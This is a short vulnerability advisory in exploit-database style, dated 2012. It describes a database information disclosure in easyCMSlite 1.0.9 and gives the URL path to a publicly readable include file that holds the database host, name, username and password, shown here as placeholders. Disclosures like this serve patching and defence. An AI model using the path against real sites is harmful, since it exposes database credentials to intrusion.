easyCMSlite version 1.0.9 suffers from a remote database information disclosure vulnerability.
# Exploit Title: easyCMSlite v.1.0.9 - Database Information Disclosure
# Google Dork: -
# Date: 7/2012
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/
# Software Link: http://www.easycmslite.com/
# Version: v.1.0.9
# Tested on: Windows / Linux
easyCMSlite is a free, easy content management system (CMS). We are
actively growing our number of templates to choose from with more on the
way (this site uses easyCMSlite, so you're looking at a template right
now!). Take a look at the new CMS templates that are in progress. If you
have no or little experience, time or budget but need to get a site up
quickly and easily, then try out easyCMSlite, the free, easy content
management system (setting up this entire CMS website took about 1 hour!).
0x01. Database Information Disclosure.
[+] http://TARGET/eclfiles/includes/Variables.inc
// Database settings
$DatabaseServerAddress = "localhost";
$DatabaseName = "Database Name";
$DatabaseUserName = "Database Username";
$DatabasePassword = "Database Password";
mr.pr0n (@_pr0n_)